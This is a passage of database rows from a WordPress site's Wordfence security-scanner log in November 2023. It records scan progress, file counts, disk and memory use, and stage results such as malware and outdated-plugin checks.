files containing 215.45 MB of data so far'),(185142,1700415096.994317,2,'info','Analyzed 14900 files containing 217.83 MB of data so far'),(185143,1700415097.088899,2,'info','Analyzed 15000 files containing 221.76 MB of data so far'),(185139,1700415096.815069,2,'info','Analyzed 14600 files containing 214.2 MB of data so far'),(185138,1700415096.762019,2,'info','Analyzed 14500 files containing 213.51 MB of data so far'),(185137,1700415096.675430,2,'info','Analyzed 14400 files containing 209.99 MB of data so far'),(185123,1700415095.544425,2,'info','Analyzed 13000 files containing 176.42 MB of data so far'),(185124,1700415095.621152,2,'info','Analyzed 13100 files containing 176.74 MB of data so far'),(185125,1700415095.671456,2,'info','Analyzed 13200 files containing 177 MB of data so far'),(185126,1700415095.736212,2,'info','Analyzed 13300 files containing 177.75 MB of data so far'),(185127,1700415095.783451,2,'info','Analyzed 13400 files containing 178.07 MB of data so far'),(185128,1700415095.828731,2,'info','Analyzed 13500 files containing 178.52 MB of data so far'),(185129,1700415095.888079,2,'info','Analyzed 13600 files containing 178.9 MB of data so far'),(185130,1700415095.934156,2,'info','Analyzed 13700 files containing 179.32 MB of data so far'),(185087,1700415092.765008,2,'info','Analyzed 9400 files containing 116.52 MB of data so far'),(185088,1700415092.814589,2,'info','Analyzed 9500 files containing 116.59 MB of data so far'),(185089,1700415092.864585,2,'info','Analyzed 9600 files containing 116.67 MB of data so far'),(185090,1700415092.917342,2,'info','Analyzed 9700 files containing 117.14 MB of data so far'),(185055,1700415090.485097,2,'info','Analyzed 6200 files containing 71.99 MB of data so far'),(185056,1700415090.546133,2,'info','Analyzed 6300 files containing 72.34 MB of data so far'),(185057,1700415090.600397,2,'info','Analyzed 6400 files containing 72.67 MB of data so far'),(185058,1700415090.656251,2,'info','Analyzed 6500 files containing 73.06 MB of data so far'),(185059,1700415090.723158,2,'info','Analyzed 6600 files containing 73.6 MB of data so far'),(185060,1700415090.783334,2,'info','Analyzed 6700 files containing 74.1 MB of data so far'),(185061,1700415090.839165,2,'info','Analyzed 6800 files containing 74.49 MB of data so far'),(185062,1700415090.899094,2,'info','Analyzed 6900 files containing 74.99 MB of data so far'),(185063,1700415090.956477,2,'info','Analyzed 7000 files containing 75.43 MB of data so far'),(185064,1700415091.004204,2,'info','Analyzed 7100 files containing 75.73 MB of data so far'),(185065,1700415091.061187,2,'info','Analyzed 7200 files containing 76.4 MB of data so far'),(185018,1700415087.858384,2,'info','Analyzed 2500 files containing 28.65 MB of data so far'),(185019,1700415087.907418,2,'info','Analyzed 2600 files containing 28.94 MB of data so far'),(185228,1700415151.391067,2,'info','Scanned contents of 2562 additional files at 49.98 per second'),(185229,1700415152.401873,2,'info','Scanned contents of 2635 additional files at 50.41 per second'),(185230,1700415153.403234,2,'info','Scanned contents of 2734 additional files at 51.32 per second'),(185231,1700415154.410859,2,'info','Scanned contents of 2825 additional files at 52.04 per second'),(185131,1700415095.981595,2,'info','Analyzed 13800 files containing 179.83 MB of data so far'),(185132,1700415096.070063,2,'info','Analyzed 13900 files containing 182.75 MB of data so far'),(185133,1700415096.121667,2,'info','Analyzed 14000 files containing 183.59 MB of data so far'),(185146,1700415097.329433,2,'info','Analyzed 15300 files containing 225.73 MB of data so far'),(185147,1700415097.448517,2,'info','Analyzed 15400 files containing 228.71 MB of data so far'),(185148,1700415097.528968,2,'info','Analyzed 15500 files containing 229.66 MB of data so far'),(185149,1700415097.614356,2,'info','Analyzed 15600 files containing 231.23 MB of data so far'),(185150,1700415097.676626,2,'info','Analyzed 15700 files containing 232.01 MB of data so far'),(185151,1700415097.733560,2,'info','Analyzed 15800 files containing 232.71 MB of data so far'),(185152,1700415097.786873,2,'info','Analyzed 15900 files containing 232.99 MB of data so far'),(185153,1700415097.833710,2,'info','Analyzed 16000 files containing 233.25 MB of data so far'),(185154,1700415097.884820,2,'info','Analyzed 16100 files containing 233.56 MB of data so far'),(185155,1700415097.934557,2,'info','Analyzed 16200 files containing 233.73 MB of data so far'),(185156,1700415097.986060,2,'info','Analyzed 16300 files containing 233.83 MB of data so far'),(185157,1700415098.033422,2,'info','Analyzed 16400 files containing 234.04 MB of data so far'),(185158,1700415098.101468,2,'info','Analyzed 16500 files containing 235.4 MB of data so far'),(185159,1700415098.178908,2,'info','Analyzed 16600 files containing 237.55 MB of data so far'),(185205,1700415127.806640,2,'info','Scanned contents of 1576 additional files at 56.93 per second'),(185204,1700415126.652291,2,'info','Scanned contents of 1492 additional files at 56.24 per second'),(185203,1700415125.631754,2,'info','Scanned contents of 1461 additional files at 57.28 per second'),(185066,1700415091.161408,2,'info','Analyzed 7300 files containing 79.71 MB of data so far'),(185067,1700415091.227946,2,'info','Analyzed 7400 files containing 81.31 MB of data so far'),(185068,1700415091.284228,2,'info','Analyzed 7500 files containing 82.18 MB of data so far'),(185069,1700415091.339815,2,'info','Analyzed 7600 files containing 82.66 MB of data so far'),(185070,1700415091.390968,2,'info','Analyzed 7700 files containing 82.93 MB of data so far'),(185256,1700415179.827410,2,'info','Scanned contents of 4915 additional files at 61.67 per second'),(185255,1700415178.786400,2,'info','Scanned contents of 4881 additional files at 62.05 per second'),(185254,1700415177.762308,2,'info','Scanned contents of 4844 additional files at 62.39 per second'),(185072,1700415091.539060,2,'info','Analyzed 7900 files containing 86.16 MB of data so far'),(185073,1700415091.621160,2,'info','Analyzed 8000 files containing 87.49 MB of data so far'),(185074,1700415091.691051,2,'info','Analyzed 8100 files containing 88.72 MB of data so far'),(185075,1700415091.807427,2,'info','Analyzed 8200 files containing 91.04 MB of data so far'),(185076,1700415091.933932,2,'info','Analyzed 8300 files containing 95.07 MB of data so far'),(185077,1700415091.975899,2,'info','Analyzed 8400 files containing 95.61 MB of data so far'),(185078,1700415092.025398,2,'info','Analyzed 8500 files containing 96.04 MB of data so far'),(185079,1700415092.075933,2,'info','Analyzed 8600 files containing 96.42 MB of data so far'),(185080,1700415092.272314,2,'info','Analyzed 8700 files containing 105.12 MB of data so far'),(185081,1700415092.370131,2,'info','Analyzed 8800 files containing 109.06 MB of data so far'),(185082,1700415092.419756,2,'info','Analyzed 8900 files containing 109.23 MB of data so far'),(185083,1700415092.493954,2,'info','Analyzed 9000 files containing 109.84 MB of data so far'),(185084,1700415092.600574,2,'info','Analyzed 9100 files containing 114.82 MB of data so far'),(185024,1700415088.213580,2,'info','Analyzed 3100 files containing 33.17 MB of data so far'),(185168,1700415099.222515,2,'info','Analyzed 17500 files containing 273.69 MB of data so far'),(185161,1700415098.367463,2,'info','Analyzed 16800 files containing 242.19 MB of data so far'),(185162,1700415098.436440,2,'info','Analyzed 16900 files containing 243.81 MB of data so far'),(185163,1700415098.753369,2,'info','Analyzed 17000 files containing 260.18 MB of data so far'),(185164,1700415098.894255,2,'info','Analyzed 17100 files containing 264.24 MB of data so far'),(185165,1700415098.977659,2,'info','Analyzed 17200 files containing 266.25 MB of data so far'),(185166,1700415099.052246,2,'info','Analyzed 17300 files containing 267.71 MB of data so far'),(185167,1700415099.162703,2,'info','Analyzed 17400 files containing 272.07 MB of data so far'),(185095,1700415093.321341,2,'info','Analyzed 10200 files containing 128.04 MB of data so far'),(185096,1700415093.372815,2,'info','Analyzed 10300 files containing 128.47 MB of data so far'),(185097,1700415093.471100,2,'info','Analyzed 10400 files containing 130.85 MB of data so far'),(185098,1700415093.538426,2,'info','Analyzed 10500 files containing 131.45 MB of data so far'),(185099,1700415093.630140,2,'info','Analyzed 10600 files containing 133.38 MB of data so far'),(185100,1700415093.821533,2,'info','Analyzed 10700 files containing 141.74 MB of data so far'),(185101,1700415093.990964,2,'info','Analyzed 10800 files containing 148.29 MB of data so far'),(185102,1700415094.066977,2,'info','Analyzed 10900 files containing 149.53 MB of data so far'),(185103,1700415094.117303,2,'info','Analyzed 11000 files containing 150.09 MB of data so far'),(185104,1700415094.167813,2,'info','Analyzed 11100 files containing 150.44 MB of data so far'),(185105,1700415094.226369,2,'info','Analyzed 11200 files containing 150.96 MB of data so far'),(185106,1700415094.301959,2,'info','Analyzed 11300 files containing 152.47 MB of data so far'),(185107,1700415094.344314,2,'info','Analyzed 11400 files containing 152.54 MB of data so far'),(185108,1700415094.396465,2,'info','Analyzed 11500 files containing 153.1 MB of data so far'),(185109,1700415094.459998,2,'info','Analyzed 11600 files containing 153.64 MB of data so far'),(185110,1700415094.554691,2,'info','Analyzed 11700 files containing 155.26 MB of data so far'),(185111,1700415094.650038,2,'info','Analyzed 11800 files containing 157.21 MB of data so far'),(185112,1700415094.780377,2,'info','Analyzed 11900 files containing 164.63 MB of data so far'),(185113,1700415094.850519,2,'info','Analyzed 12000 files containing 166.38 MB of data so far'),(185114,1700415094.915035,2,'info','Analyzed 12100 files containing 167.3 MB of data so far'),(185115,1700415094.969355,2,'info','Analyzed 12200 files containing 168.11 MB of data so far'),(185116,1700415095.029279,2,'info','Analyzed 12300 files containing 168.74 MB of data so far'),(185094,1700415093.207185,2,'info','Analyzed 10100 files containing 122.96 MB of data so far'),(185093,1700415093.154099,2,'info','Analyzed 10000 files containing 122.44 MB of data so far'),(185092,1700415093.112582,2,'info','Analyzed 9900 files containing 122.11 MB of data so far'),(185091,1700415092.994010,2,'info','Analyzed 9800 files containing 118.8 MB of data so far'),(184909,1700324440.601159,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(184910,1700324440.607144,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(184911,1700324440.608571,1,'info','-------------------'),(184453,1699979264.197200,1,'info','Initiating quick scan'),(185262,1700415186.470161,2,'info','Scanned contents of 5008 additional files at 58.00 per second'),(185263,1700415187.495025,2,'info','Scanned contents of 5035 additional files at 57.63 per second'),(185181,1700415103.180945,2,'info','Scanned contents of 137 additional files at 44.84 per second'),(185134,1700415096.182210,2,'info','Analyzed 14100 files containing 183.99 MB of data so far'),(185135,1700415096.273441,2,'info','Analyzed 14200 files containing 186.31 MB of data so far'),(185136,1700415096.533991,2,'info','Analyzed 14300 files containing 203.99 MB of data so far'),(185122,1700415095.454106,2,'info','Analyzed 12900 files containing 174.85 MB of data so far'),(185121,1700415095.395698,2,'info','Analyzed 12800 files containing 174.5 MB of data so far'),(185120,1700415095.334047,2,'info','Analyzed 12700 files containing 174.06 MB of data so far'),(185023,1700415088.136242,2,'info','Analyzed 3000 files containing 30.98 MB of data so far'),(185022,1700415088.076410,2,'info','Analyzed 2900 files containing 30.05 MB of data so far'),(185021,1700415088.017642,2,'info','Analyzed 2800 files containing 29.96 MB of data so far'),(185232,1700415155.418425,2,'info','Scanned contents of 2916 additional files at 52.74 per second'),(185233,1700415156.429910,2,'info','Scanned contents of 3005 additional files at 53.37 per second'),(185234,1700415157.451161,2,'info','Scanned contents of 3089 additional files at 53.89 per second'),(185182,1700415104.206591,2,'info','Scanned contents of 244 additional files at 59.79 per second'),(184458,1699979264.211055,1,'info','-------------------'),(184459,1699979264.211465,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(185261,1700415185.424231,2,'info','Scanned contents of 4992 additional files at 58.52 per second'),(185260,1700415184.380912,2,'info','Scanned contents of 4981 additional files at 59.12 per second'),(184460,1699979264.217439,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(185259,1700415183.224260,2,'info','Scanned contents of 4966 additional files at 59.76 per second'),(185258,1700415182.066881,2,'info','Scanned contents of 4948 additional files at 60.38 per second'),(185257,1700415181.023606,2,'info','Scanned contents of 4931 additional files at 60.95 per second'),(185253,1700415176.693952,2,'info','Scanned contents of 4812 additional files at 62.85 per second'),(185218,1700415141.149412,2,'info','Scanned contents of 2029 additional files at 49.46 per second'),(185217,1700415140.139124,2,'info','Scanned contents of 1982 additional files at 49.53 per second'),(185216,1700415139.092805,2,'info','Scanned contents of 1962 additional files at 50.35 per second'),(185215,1700415138.078557,2,'info','Scanned contents of 1944 additional files at 51.22 per second'),(185214,1700415137.043589,2,'info','Scanned contents of 1922 additional files at 52.06 per second'),(185213,1700415136.043320,2,'info','Scanned contents of 1878 additional files at 52.29 per second'),(185212,1700415134.969904,2,'info','Scanned contents of 1869 additional files at 53.64 per second'),(185211,1700415133.855284,2,'info','Scanned contents of 1855 additional files at 55.00 per second'),(185210,1700415132.850195,2,'info','Scanned contents of 1837 additional files at 56.13 per second'),(185209,1700415131.838810,2,'info','Scanned contents of 1782 additional files at 56.19 per second'),(185208,1700415130.829153,2,'info','Scanned contents of 1759 additional files at 57.29 per second'),(185207,1700415129.812989,2,'info','Scanned contents of 1729 additional files at 58.24 per second'),(185206,1700415128.808908,2,'info','Scanned contents of 1602 additional files at 55.85 per second'),(185040,1700415089.561745,2,'info','Analyzed 4700 files containing 64.75 MB of data so far'),(185041,1700415089.622091,2,'info','Analyzed 4800 files containing 65.21 MB of data so far'),(185011,1700415087.475056,2,'info','Analyzed 1800 files containing 25.28 MB of data so far'),(185012,1700415087.531831,2,'info','Analyzed 1900 files containing 25.66 MB of data so far'),(185248,1700415171.576424,2,'info','Scanned contents of 4363 additional files at 61.06 per second'),(184463,1700065137.248901,1,'info','Initiating quick scan'),(185249,1700415172.577196,2,'info','Scanned contents of 4470 additional files at 61.70 per second'),(185250,1700415173.586662,2,'info','Scanned contents of 4575 additional files at 62.28 per second'),(184468,1700065137.257869,1,'info','-------------------'),(184469,1700065137.258248,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(185170,1700415099.327268,2,'info','Analyzed 17632 files containing 275.79 MB of data.'),(185171,1700415099.327418,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(185172,1700415099.329520,10,'info','SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),(185173,1700415099.331592,10,'info','SUM_ENDOK:Scanning for known malware files'),(185174,1700415099.335175,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(185175,1700415099.623660,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(185180,1700415102.178131,2,'info','Scanned contents of 51 additional files at 24.85 per second'),(185179,1700415101.143744,2,'info','Scanned contents of 25 additional files at 24.55 per second'),(185176,1700415099.627226,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(185177,1700415099.628201,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(185178,1700415100.124556,2,'info','Starting scan of file contents'),(184470,1700065137.263978,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(184938,1700415084.761110,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(185017,1700415087.791594,2,'info','Analyzed 2400 files containing 27.73 MB of data so far'),(184937,1700415084.759911,10,'info','SUM_START:Checking Web Application Firewall status'),(184921,1700410266.916745,1,'info','-------------------'),(184922,1700410266.917190,2,'info','Wordfence used 2 MB of memory for scan. Server peak memory usage was: 34 MB'),(184923,1700410266.922408,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(184924,1700410266.922589,10,'info','SUM_FINAL:Scan complete. You have 3 new issues to fix. See below.'),(184925,1700415078.015108,1,'info','Scheduled Wordfence scan starting at Sunday 19th of November 2023 10:31:18 AM'),(184926,1700415078.451659,10,'info','SUM_PREP:Preparing a new scan.'),(184927,1700415078.453484,1,'info','Contacting Wordfence to initiate scan'),(184928,1700415078.743465,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(184929,1700415080.744699,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(184930,1700415082.745897,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(184931,1700415084.748914,10,'info','SUM_START:Checking for the most secure way to get IPs'),(184932,1700415084.751030,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(184933,1700415084.755008,10,'info','SUM_START:Scanning to check available disk space'),(184934,1700415084.756337,2,'info','Total disk space: 89.86 GB -- Free disk space: 56.59 GB'),(184935,1700415084.756480,2,'info','The disk has 57945.96 MB available'),(184936,1700415084.756590,10,'info','SUM_ENDOK:Scanning to check available disk space'),(185117,1700415095.100657,2,'info','Analyzed 12400 files containing 169.85 MB of data so far'),(185118,1700415095.172403,2,'info','Analyzed 12500 files containing 170.92 MB of data so far'),(185086,1700415092.704428,2,'info','Analyzed 9300 files containing 115.71 MB of data so far'),(185085,1700415092.654522,2,'info','Analyzed 9200 files containing 115.09 MB of data so far'),(185144,1700415097.185328,2,'info','Analyzed 15100 files containing 223.4 MB of data so far'),(185145,1700415097.267445,2,'info','Analyzed 15200 files containing 224.63 MB of data so far'),(185039,1700415089.497528,2,'info','Analyzed 4600 files containing 64.46 MB of data so far'),(185038,1700415089.437008,2,'info','Analyzed 4500 files containing 64.14 MB of data so far'),(185037,1700415089.377748,2,'info','Analyzed 4400 files containing 63.65 MB of data so far'),(185036,1700415089.289850,2,'info','Analyzed 4300 files containing 62.07 MB of data so far'),(185035,1700415089.222070,2,'info','Analyzed 4200 files containing 61.43 MB of data so far'),(185034,1700415089.162087,2,'info','Analyzed 4100 files containing 60.39 MB of data so far'),(185025,1700415088.299163,2,'info','Analyzed 3200 files containing 35.17 MB of data so far'),(185026,1700415088.355592,2,'info','Analyzed 3300 files containing 35.84 MB of data so far'),(185027,1700415088.413555,2,'info','Analyzed 3400 files containing 36.19 MB of data so far'),(185028,1700415088.517802,2,'info','Analyzed 3500 files containing 38.9 MB of data so far'),(185029,1700415088.580627,2,'info','Analyzed 3600 files containing 40.32 MB of data so far'),(185030,1700415088.723817,2,'info','Analyzed 3700 files containing 47.65 MB of data so far'),(185031,1700415088.854728,2,'info','Analyzed 3800 files containing 52.9 MB of data so far'),(185032,1700415088.952092,2,'info','Analyzed 3900 files containing 55.49 MB of data so far'),(185033,1700415089.057209,2,'info','Analyzed 4000 files containing 57.73 MB of data so far'),(184908,1700324440.598952,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(184906,1700324440.597314,1,'info','Initiating quick scan'),(184907,1700324440.598687,10,'info','SUM_START:Checking Web Application Firewall status'),(184905,1700324440.594889,10,'info','SUM_PREP:Preparing a new scan.'),(184904,1700237739.603871,10,'info','SUM_FINAL:Scan complete. You have 3 new issues to fix. See below.'),(184903,1700237739.603586,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(184902,1700237739.559330,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 34 MB'),(184901,1700237739.558916,1,'info','-------------------'),(184900,1700237739.557419,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(184899,1700237739.551835,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(184898,1700237739.549521,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(184897,1700237739.549162,10,'info','SUM_START:Checking Web Application Firewall status'),(184895,1700237739.546864,10,'info','SUM_PREP:Preparing a new scan.'),(184896,1700237739.547925,1,'info','Initiating quick scan'),(184355,1699896122.843367,2,'info','Scanned contents of 5134 additional files at 59.30 per second'),(184356,1699896123.919585,2,'info','Scanned contents of 5161 additional files at 58.88 per second'),(184357,1699896124.969034,2,'info','Scanned contents of 5185 additional files at 58.46 per second'),(184358,1699896125.973705,2,'info','Scanned contents of 5237 additional files at 58.38 per second'),(184359,1699896127.007772,2,'info','Scanned contents of 5318 additional files at 58.61 per second'),(184360,1699896128.041477,2,'info','Scanned contents of 5386 additional files at 58.69 per second'),(184361,1699896129.049145,2,'info','Scanned contents of 5495 additional files at 59.23 per second'),(184362,1699896130.838288,2,'info','Scanned contents of 5540 additional files at 58.58 per second'),(184363,1699896131.841437,2,'info','Scanned contents of 5687 additional files at 59.50 per second'),(184364,1699896133.294205,2,'info','Scanned contents of 5773 additional files at 59.50 per second'),(184365,1699896134.349512,2,'info','Scanned contents of 5808 additional files at 59.22 per second'),(184366,1699896135.366324,2,'info','Scanned contents of 5829 additional files at 58.82 per second'),(184367,1699896136.410969,2,'info','Scanned contents of 5881 additional files at 58.73 per second'),(184368,1699896137.439383,2,'info','Scanned contents of 5930 additional files at 58.61 per second'),(184369,1699896138.487032,2,'info','Scanned contents of 5969 additional files at 58.39 per second'),(184370,1699896139.521079,2,'info','Scanned contents of 6018 additional files at 58.28 per second'),(184371,1699896140.544567,2,'info','Scanned contents of 6056 additional files at 58.08 per second'),(184372,1699896141.626628,2,'info','Scanned contents of 6069 additional files at 57.60 per second'),(184373,1699896142.632512,2,'info','Scanned contents of 6081 additional files at 57.17 per second'),(184374,1699896143.666522,2,'info','Scanned contents of 6093 additional files at 56.73 per second'),(184375,1699896144.708528,2,'info','Scanned contents of 6105 additional files at 56.30 per second'),(184376,1699896145.740648,2,'info','Scanned contents of 6117 additional files at 55.88 per second'),(184377,1699896146.814229,2,'info','Scanned contents of 6129 additional files at 55.44 per second'),(184378,1699896147.838004,2,'info','Scanned contents of 6141 additional files at 55.04 per second'),(184379,1699896148.838648,2,'info','Scanned contents of 6144 additional files at 54.58 per second'),(184380,1699896149.964104,2,'info','Scanned contents of 6150 additional files at 54.09 per second'),(184381,1699896151.077745,2,'info','Scanned contents of 6156 additional files at 53.62 per second'),(184382,1699896152.171777,2,'info','Scanned contents of 6162 additional files at 53.17 per second'),(184383,1699896153.254773,2,'info','Scanned contents of 6168 additional files at 52.72 per second'),(184384,1699896154.372507,2,'info','Scanned contents of 6174 additional files at 52.28 per second'),(184385,1699896155.473984,2,'info','Scanned contents of 6180 additional files at 51.84 per second'),(184386,1699896156.569180,2,'info','Scanned contents of 6186 additional files at 51.42 per second'),(184387,1699896157.679166,2,'info','Scanned contents of 6192 additional files at 51.00 per second'),(184388,1699896158.796174,2,'info','Scanned contents of 6198 additional files at 50.58 per second'),(184389,1699896159.909373,2,'info','Scanned contents of 6204 additional files at 50.18 per second'),(184390,1699896160.946567,2,'info','Scanned contents of 6209 additional files at 49.80 per second'),(184391,1699896162.039356,2,'info','Scanned contents of 6215 additional files at 49.42 per second'),(184392,1699896163.184419,2,'info','Scanned contents of 6221 additional files at 49.02 per second'),(184393,1699896164.298936,2,'info','Scanned contents of 6227 additional files at 48.64 per second'),(184394,1699896165.414089,2,'info','Scanned contents of 6233 additional files at 48.26 per second'),(184395,1699896166.529501,2,'info','Scanned contents of 6239 additional files at 47.90 per second'),(184396,1699896167.648131,2,'info','Scanned contents of 6245 additional files at 47.53 per second'),(184397,1699896168.827224,2,'info','Scanned contents of 6251 additional files at 47.16 per second'),(184398,1699896169.989342,2,'info','Scanned contents of 6257 additional files at 46.79 per second'),(184399,1699896171.120314,2,'info','Scanned contents of 6263 additional files at 46.44 per second'),(184400,1699896172.191967,2,'info','Scanned contents of 6269 additional files at 46.12 per second'),(184401,1699896173.276185,2,'info','Scanned contents of 6274 additional files at 45.79 per second'),(184402,1699896174.279881,2,'info','Scanned contents of 6277 additional files at 45.48 per second'),(184403,1699896175.354218,2,'info','Scanned contents of 6280 additional files at 45.15 per second'),(184404,1699896176.369136,2,'info','Scanned contents of 6283 additional files at 44.85 per second'),(184405,1699896177.411986,2,'info','Scanned contents of 6340 additional files at 44.92 per second'),(184406,1699896178.765099,2,'info','Scanned contents of 6346 additional files at 44.53 per second'),(184407,1699896179.800796,2,'info','Scanned contents of 6404 additional files at 44.62 per second'),(184408,1699896181.537193,2,'info','Scanned contents of 6470 additional files at 44.54 per second'),(184409,1699896182.596610,2,'info','Scanned contents of 6516 additional files at 44.53 per second'),(184410,1699896183.627821,2,'info','Scanned contents of 6538 additional files at 44.37 per second'),(184411,1699896184.629992,2,'info','Scanned contents of 6586 additional files at 44.39 per second'),(184412,1699896185.646497,2,'info','Scanned contents of 6684 additional files at 44.75 per second'),(184413,1699896186.652646,2,'info','Scanned contents of 6748 additional files at 44.87 per second'),(184414,1699896187.676888,2,'info','Scanned contents of 6804 additional files at 44.94 per second'),(184415,1699896188.680209,2,'info','Scanned contents of 6820 additional files at 44.75 per second'),(184416,1699896189.759591,2,'info','Scanned contents of 6850 additional files at 44.63 per second'),(184417,1699896190.850146,2,'info','Scanned contents of 6902 additional files at 44.65 per second'),(184418,1699896191.867101,2,'info','Scanned contents of 6930 additional files at 44.54 per second'),(184419,1699896192.715768,2,'info','Scanned contents of 6943 additional files at 44.38 per second'),(184420,1699896192.715996,2,'info','Asking Wordfence to check URLs against malware list.'),(184421,1699896192.776111,2,'info','Checking 16615 host keys against Wordfence scanning servers.'),(184422,1699896192.988537,2,'info','Done host key check.'),(184423,1699896192.993727,2,'info','Done file contents scan'),(184429,1699896193.039036,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(184430,1699896193.039477,2,'info','Checking 68 host keys against Wordfence scanning servers.'),(184431,1699896193.158196,2,'info','Done host key check.'),(184432,1699896193.158549,2,'info','Done examining URLs'),(184437,1699896193.172047,2,'info','Starting password strength check on 3 users.'),(184440,1699896203.587162,3,'error','Unable to determine version for plugin folders'),(184445,1699896203.722156,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(184446,1699896203.722470,2,'info','Done examining URLs'),(184448,1699896203.725489,1,'info','-------------------'),(184449,1699896203.725774,2,'info','Wordfence used 32.32 MB of memory for scan. Server peak memory usage was: 64.32 MB'),(184450,1699896203.731685,1,'info','Scan Complete. Scanned 18012 files, 41 plugins, 2 themes, 58 posts, 0 comments and 28677 URLs in 3 minutes 13 seconds.'),(185357,1700583187.218302,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(184473,1700151162.523873,1,'info','Initiating quick scan'),(185356,1700583187.213425,2,'info','Wordfence used 1.73 MB of memory for scan. Server peak memory usage was: 34 MB'),(185355,1700583187.213040,1,'info','-------------------'),(185354,1700583187.211569,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(184478,1700151162.532956,1,'info','-------------------'),(184479,1700151162.533359,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(184480,1700151162.539154,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(185353,1700583187.203736,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(184482,1700155328.627209,1,'info','Scheduled Wordfence scan starting at Thursday 16th of November 2023 10:22:08 AM'),(184484,1700155329.048329,1,'info','Contacting Wordfence to initiate scan'),(185352,1700583187.201440,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(185350,1700583187.199780,1,'info','Initiating quick scan'),(185351,1700583187.201151,10,'info','SUM_START:Checking Web Application Firewall status'),(185349,1700583187.196943,10,'info','SUM_PREP:Preparing a new scan.'),(185348,1700496803.286538,10,'info','SUM_FINAL:Scan complete. You have 3 new issues to fix. See below.'),(185347,1700496803.286377,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(184491,1700155336.058520,2,'info','Total disk space: 89.86 GB -- Free disk space: 56.65 GB'),(184492,1700155336.058663,2,'info','The disk has 58012.42 MB available'),(185346,1700496803.281296,2,'info','Wordfence used 1.73 MB of memory for scan. Server peak memory usage was: 34 MB'),(185345,1700496803.280914,1,'info','-------------------'),(185344,1700496803.279525,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(185343,1700496803.273886,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(185342,1700496803.271629,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(184500,1700155336.076379,2,'info','Getting plugin list from WordPress'),(184501,1700155336.079566,2,'info','Found 40 plugins'),(184502,1700155336.079710,2,'info','Getting theme list from WordPress'),(184503,1700155336.079950,2,'info','Found 2 themes'),(185341,1700496803.271350,10,'info','SUM_START:Checking Web Application Firewall status'),(185339,1700496803.268420,10,'info','SUM_PREP:Preparing a new scan.'),(185340,1700496803.269758,1,'info','Initiating quick scan'),(184506,1700155336.721252,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(184507,1700155336.723871,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(184508,1700155336.725878,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(184509,1700155336.726790,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(184510,1700155336.728564,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(184511,1700155336.729862,10,'info','SUM_DISABLED:Skipping theme scan'),(184512,1700155336.730139,10,'info','SUM_DISABLED:Skipping plugin scan'),(184513,1700155336.731172,10,'info','SUM_START:Scanning for known malware files'),(184514,1700155336.733186,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(184515,1700155336.748331,2,'info','500 files indexed'),(184516,1700155336.763885,2,'info','1000 files indexed'),(184517,1700155336.783894,2,'info','1500 files indexed'),(184518,1700155336.801146,2,'info','2000 files indexed'),(184519,1700155336.817004,2,'info','2500 files indexed'),(184520,1700155336.828158,2,'info','3000 files indexed'),(184521,1700155336.840410,2,'info','3500 files indexed'),(184522,1700155336.854331,2,'info','4000 files indexed'),(184523,1700155336.876035,2,'info','4500 files indexed'),(184524,1700155336.890801,2,'info','5000 files indexed'),(184525,1700155336.915605,2,'info','5500 files indexed'),(184526,1700155336.938274,2,'info','6000 files indexed'),(184527,1700155336.953701,2,'info','6500 files indexed'),(184528,1700155336.968499,2,'info','7000 files indexed'),(184529,1700155336.985672,2,'info','7500 files indexed'),(184530,1700155337.006434,2,'info','8000 files indexed'),(184531,1700155337.018827,2,'info','8500 files indexed'),(184532,1700155337.037260,2,'info','9000 files indexed'),(184533,1700155337.054931,2,'info','9500 files indexed'),(184534,1700155337.066681,2,'info','10000 files indexed'),(184535,1700155337.077527,2,'info','10500 files indexed'),(184536,1700155337.089587,2,'info','11000 files indexed'),(184537,1700155337.102158,2,'info','11500 files indexed'),(184538,1700155337.113682,2,'info','12000 files indexed'),(184539,1700155337.124985,2,'info','12500 files indexed'),(184540,1700155337.137001,2,'info','13000 files indexed'),(184541,1700155337.149993,2,'info','13500 files indexed'),(184542,1700155337.161594,2,'info','14000 files indexed'),(184543,1700155337.194480,2,'info','14500 files indexed'),(184544,1700155337.372874,2,'info','15000 files indexed'),(184545,1700155337.385178,2,'info','15500 files indexed'),(184546,1700155337.396650,2,'info','16000 files 